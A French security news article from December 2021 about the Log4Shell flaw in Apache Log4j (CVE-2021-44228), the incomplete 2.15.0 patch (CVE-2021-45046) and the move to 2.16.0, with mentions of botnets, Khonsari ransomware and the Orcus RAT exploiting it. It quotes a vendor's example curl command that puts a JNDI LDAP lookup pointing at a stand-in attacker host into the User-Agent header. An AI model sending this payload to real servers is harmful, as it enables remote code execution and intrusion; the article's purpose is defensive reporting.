Actualités

[MAJ 15 / 12] Log4j (Log4Shell) : à nouveau, déploiement d’une seconde mise à jour estampillée en version 2.16.0 ! (le patch du patch…)

>>> Mise à jour du 15 Décembre 2021 (actualisation post-publication) : BitDefender, dans un PoC du 13 Décembre 2021, commence à relater techniquement le modus operandi de la première vulnérabilité (CVE-2021-44228). “Pour que cette vulnérabilité fonctionne, l’attaquant doit simplement trouver un moyen d’obtenir une chaîne spécialement conçue à traiter par le cadre de journalisation Log4j. Par exemple, une application Web (cible de cette vulnérabilité) stocke souvent la chaîne de l’agent utilisateur qui identifie le navigateur utilisé par les visiteurs. String userAgent = request.getRequestHeader(“User-Agent”); log.info(userAgent); Un attaquant peut spécifier une chaîne user-agent personnalisée pour sa connexion. Ces informations sont enregistrées dans le fichier journal – et lors de leur traitement, Log4j est compromis. curl http://victim.com/ -A “${ jndi:ldap://attacker.com/reference} est-il démontré par les équipes sécuritaires de l’éditeur de solutions anti-virus.

 

 

Bon nombre de botnets seraient déjà en train d’exploiter actuellement cette faille dont le robot Muhstik. Il serait également question de l’apparition d’une nouvelle famille de ransomware : par l’entremise de Khonsari, les fichiers sont chiffrés en 128 AES CBC avec une extension – .khonsari, d’où le nom – ajouté à la fin de ce chiffrement. Un RAT (Remote Access Trojan) nommé Orcus a également été repéré par les chercheurs : celui-ci recèle un fichier .jar pour mieux distiller une cyber-attaque persistante via un chargement (shell-code) de la charge virale, directement depuis la mémoire, avec d’autres ressources ; le tout via communication-serveur command-and-control… A veiller ! <<<


Actualité originelle, le 15 Décembre 2021

Alors qu’une première rustine avait été déployée dans l’urgence pour combler une vulnérabilité 0-day divulguée publiquement depuis le 9 Décembre 2021 – première observation ou réminiscence depuis le 1er Décembre 2021, selon le co-fondateur et CEO de CloudFlare – il semble que cela n’ai pas suffit : en cause, cette fois, le  Mapped Diagnostic Context (MDC)…

 

(Source : blog CheckPoint – CVE-2021-44228)

 

Il a été constaté que le correctif pour traiter CVE-2021-44228 dans Apache Log4j 2.15.0 était incomplet dans certaines configurations autres que celles par défaut. Cela pourrait permettre aux attaquants de contrôler les données d’entrée de la carte de contexte de thread (MDC) lorsque la configuration de la journalisation utilise une disposition de modèle autre que celle par défaut avec une recherche de contexte (par exemple, $${ctx:loginId}) ou un modèle de carte de contexte de thread ( %X, %mdc ou %MDC) pour créer des données d’entrée malveillantes à l’aide d’un modèle de recherche JNDI entraînant une attaque par déni de service (DOS). Log4j 2.15.0 limite les recherches LDAP JNDI à localhost par défaut. Notez que les atténuations précédentes impliquant une configuration telle que la définition de la propriété système `log4j2.noFormatMsgLookup` sur `true` n’atténuent PAS cette vulnérabilité spécifique”, est-il clairement expliqué au sein du bulletin sécuritaire de cette nouvelle vulnérabilité, assignée CVE-2021-45046. Il convient donc de mettre à jour Log4j2, si ce n’est déjà fait, dans l’immédiat.

 

Le régulateur néerlandais, le Nationaal Cyber-Security Centrum (NCSC), depuis le 13 Décembre 2021 et outre les autres ressources déjà évoqué dans cette actualité, a publié un listing depuis Github, par éditeur, de l’impact de la vulnérabilité tout en notant que seule la vulnérabilité CVE-2021-44228 (première rustine, donc) est évoquée. Selon les notes de publication d’Apache, seule la version Log4j v2 et supérieure reste concernée : il faut donc sans attendre appliquer ce second patch correctif, en mettant à jour vers la version 2.16.0… A veiller !




  • 0% J'apprécieVS
    100% Je n'apprécie pas
    Pas de commentaire

    Laisser un commentaire

    ;) :zzz: :youpi: :yes: :xmas: :wink: :whistle: :warning: :twisted: :sw: :sleep: :sg1: :schwarzy: :sarko: :sante: :rollol: :roll: :rip: :pt1cable: :popcorn: :pff: :patapai: :paf: :p :ouch: :oops: :o :non: :na: :mrgreen: :mdr: :macron: :love: :lol: :kissou: :kaola: :jesuisdehors: :jap: :ilovesos: :idea: :houra: :hello: :heink: :grumpy: :fume: :frenchy: :fouet: :fouet2: :first: :fessee: :evil: :dispute: :demon: :cryy: :cry: :cpignon: :cool: :cassepc: :capello: :calin: :bug: :boxe: :bounce: :bluesbro: :bisou: :babyyoda: :assassin: :arrow: :annif: :ange: :amen: :D :??: :?: :/ :-| :-x :-o :-P :-D :-? :-8 :-1: :+1: :) :( 8-O

    Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

    Copyright © Association SOSOrdi.net 1998-2022 - v1.12.0